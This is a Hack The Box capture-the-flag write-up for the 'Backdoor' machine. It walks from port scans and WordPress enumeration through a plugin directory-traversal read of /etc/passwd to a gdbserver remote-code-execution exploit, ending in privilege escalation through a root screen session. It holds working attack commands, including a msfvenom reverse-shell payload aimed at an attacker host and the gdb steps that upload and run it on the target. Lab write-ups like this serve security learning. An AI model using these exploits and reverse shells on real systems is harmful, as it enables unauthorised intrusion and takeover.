Hackthebox Backdoor

Prepared by imamrahman15

version 1.0
March 2022
 Contents
1. High Level Summary ................................................................................................................... 3
2. Attack Narrative Methodology .................................................................................................... 3
2.1. Phase 1 – Reconnaissance .................................................................................................... 3
2.2. Phase 2 - Enumeration ......................................................................................................... 4
2.3. Phase 3 - Penetration .......................................................................................................... 15
2.3.1. screen ........................................................................................................................... 15
3. Additional Resource ................................................................................................................... 17

Page | 2
1. High Level Summary
When performing reconnaissance and enumeration steps, there are several vulnerabilities
identified on the paper machine that can be used to gain access to the target.

• WordPress plugin LFI

Got enumeration pid process from the server with LFI

• Screen Session
Screen session misconfiguration, make unauthorize using

Figure 1 Backdoor Flag

2. Attack Narrative Methodology

2.1. Phase 1 – Reconnaissance
Here the results from scanning ports against target machine, you can see additional resource
for the detail scan method.
Table 1 Reconnaissance - Scanning Results
Port State Service Version
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu
Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
1337/tcp open Waste? -

Page | 3
2.2. Phase 2 - Enumeration
2.2.1. HTTP
Scanning
Try this one: https://github.com/rkhal101/nmapAutomator
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/nmapAutomator/10.10.11.125]
└──╼ [★]$ cat nmap/Full_10.10.11.125.nmap
# Nmap 7.92 scan initiated Fri Mar 18 01:12:35 2022 as: nmap -Pn -sCV -p1337 -oN nmap/Full_10.10.11.125.nmap 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.0030s latency).

PORT STATE SERVICE VERSION

1337/tcp open waste?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Fri Mar 18 01:12:46 2022 -- 1 IP address (1 host up) scanned in 11.61 seconds
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/nmapAutomator/10.10.11.125]
└──╼ [★]$ cat nmap/Basic_10.10.11.125.nmap
# Nmap 7.92 scan initiated Fri Mar 18 01:10:15 2022 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.11.125.nmap 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.0029s latency).

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
|_http-generator: WordPress 5.8.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Fri Mar 18 01:10:23 2022 -- 1 IP address (1 host up) scanned in 8.28 seconds
Nikto and found url http://10.10.11.125/index.php/wp-json/wp/v2/pages/11
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator]
└──╼ [★]$ cat 10.10.11.125/recon/nikto_10.10.11.125_80.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.125
+ Target Hostname: 10.10.11.125
+ Target Port: 80
+ Start Time: 2022-03-17 03:58:08 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<http://10.10.11.125/index.php/wp-json/>;
rel="https://api.w.org/",<http://10.10.11.125/index.php/wp-json/wp/v2/pages/11>; rel="alternate";
type="application/json",<http://10.10.11.125/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to
the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information

Page | 4
 + /wp-login.php: Wordpress login found
+ 7890 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2022-03-17 03:59:24 (GMT0) (76 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?

Try to access web server

http://10.10.11.125/index.php/wp-json/wp/v2/pages/11
and get the backend url backdoor.htb

Mapping to /etc/hosts
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator]
└──╼ [★]$ cat /etc/hosts
# Host addresses
10.10.11.125 backdoor.htb
127.0.0.1 localhost
127.0.1.1 pwnbox-base
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator]
└──╼ [★]$ ping backdoor.htb
PING backdoor.htb (10.10.11.125) 56(84) bytes of data.
64 bytes from backdoor.htb (10.10.11.125): icmp_seq=1 ttl=63 time=2.04 ms
64 bytes from backdoor.htb (10.10.11.125): icmp_seq=2 ttl=63 time=2.24 ms
^C
--- backdoor.htb ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 2.044/2.140/2.237/0.096 ms

Page | 5
 Wpscan found
[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 4.2.2
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ wpscan --url http://backdoor.htb/ --enumerate p,u --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\\ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://backdoor.htb/ [10.10.11.125]

[+] Started: Thu Mar 17 04:20:59 2022

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php

| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://backdoor.htb/readme.html

| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/

| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php

| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).

| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen

| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt

Page | 6
 | [!] The version is out of date, the latest version is 2.9
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'

[+] Enumerating Most Popular Plugins (via Aggressive Methods)

Checking Known Locations - Time: 00:00:02
<===============================================================================================
============> (1500 / 1500) 100.00% Time: 00:00:02
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 4.2.2
| Last Updated: 2022-01-24T16:11:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)

Brute Forcing Author IDs - Time: 00:00:00
<===============================================================================================
================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://backdoor.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 17 04:21:15 2022

[+] Requests Done: 1516
[+] Cached Requests: 49
[+] Data Sent: 415.521 KB
[+] Data Received: 216.232 KB
[+] Memory used: 238.242 MB
[+] Elapsed time: 00:00:16

Page | 7
 Try to access url Location: http://backdoor.htb/wp-content/plugins/akismet/ 403 and go down

Found vulner WordPress plugin

[+] WordPress Plugin eBook Download 1.1 - Directory Traversal | php/webapps/39575.txt
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ searchsploit akismet
---------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities |
php/webapps/37902.php
WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting |
php/webapps/30036.html
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ searchsploit ebook download 1.1
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin eBook Download 1.1 - Directory Traversal |
php/webapps/39575.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/10.10.11.125]
└──╼ [★]$ cat /usr/share/exploitdb/exploits/php/webapps/39575.txt
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7

[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================

[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Page | 8
 Try to access the poc and success lfi
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~/backdoor/nmapAutomator/LFISuite]
└──╼ [★]$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd
/etc/passwd/etc/passwd/etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>─

Page | 9
 From lfi try to detect the pid from all process, and found pid from gdbserver
http://backdoor.htb/wp-content/plugins/ebook-
download/filedownload.php?ebookdownloadurl=/prod/[pid]/cmdline

Page | 10
 Found vulner
https://www.exploit-db.com/raw/50539

─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ wget https://www.exploit-db.com/raw/50539
--2022-03-18 03:13:39-- https://www.exploit-db.com/raw/50539
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2826 (2.8K) [text/plain]
Saving to: ‘50539’

50539
100%[===========================================================================================
=========>] 2.76K --.-KB/s in 0s

2022-03-18 03:13:40 (72.0 MB/s) - ‘50539’ saved [2826/2826]

─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ head 50539
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ less 50539
# Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)
# Date: 2021-11-21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

Page | 11
 import binascii
import socket
import struct
import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver -> 10.10.10.200:1337
- Attacker's listener -> 10.10.10.100:4444

1. Generate shellcode with msfvenom:

$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:

$ nc -nlvp 4444

3. Run the exploit:

$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''

def checksum(s: str) -> str:

res = sum(map(ord, s)) % 256
return f'{res:2x}'

def ack(sock):
sock.send(b'+')

def send(sock, s: str) -> str:

sock.send(f'${s}#{checksum(s)}'.encode())
res = sock.recv(1024)
ack(sock)
return res.decode()
run gdbserver exploit (https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver)
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: binary.elf
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ chmod +x binary.elf
─[sg-vip-1]─[10.10.14.10]─[htb-imamrahman15@pwnbox-base]─[~]
└──╼ [★]$ gdb binary.elf
GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

Page | 12
 For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from binary.elf...
(No debugging symbols found in binary.elf)
(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
(gdb) remote put binary.elf binary.elf
Successfully sent file "binary.elf".
(gdb) set remote exec-file /home/user/binary.elf
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /home/user/binary.elf from remote target...
Reading /home/user/binary.elf from remote target...
Reading symbols from target:/home/user/binary.elf...
(No debugging symbols found in target:/home/user/binary.elf)
[Detaching after fork from child process 29240]
[Inferior 1 (process 29237) exited normally]
(gdb)

Page | 13
 From another shell, try to listen port

Page | 14
2.3. Phase 3 - Penetration
2.3.1. screen
download linpeas and send to target with bind shell

Page | 15
 Found interesting process “screen from root”

Try to spawn shell (https://netsec.ws/?p=337) and use the screen from root, and boom got the
root

Page | 16
3. Additional Resource
3.1. Initial Scan
Table 2 Additional Resource – Initial Scan result with nmapAutomator.sh Basic

3.2. Full Scan

Table 3 Additional Resource – Full Scan result

Page | 17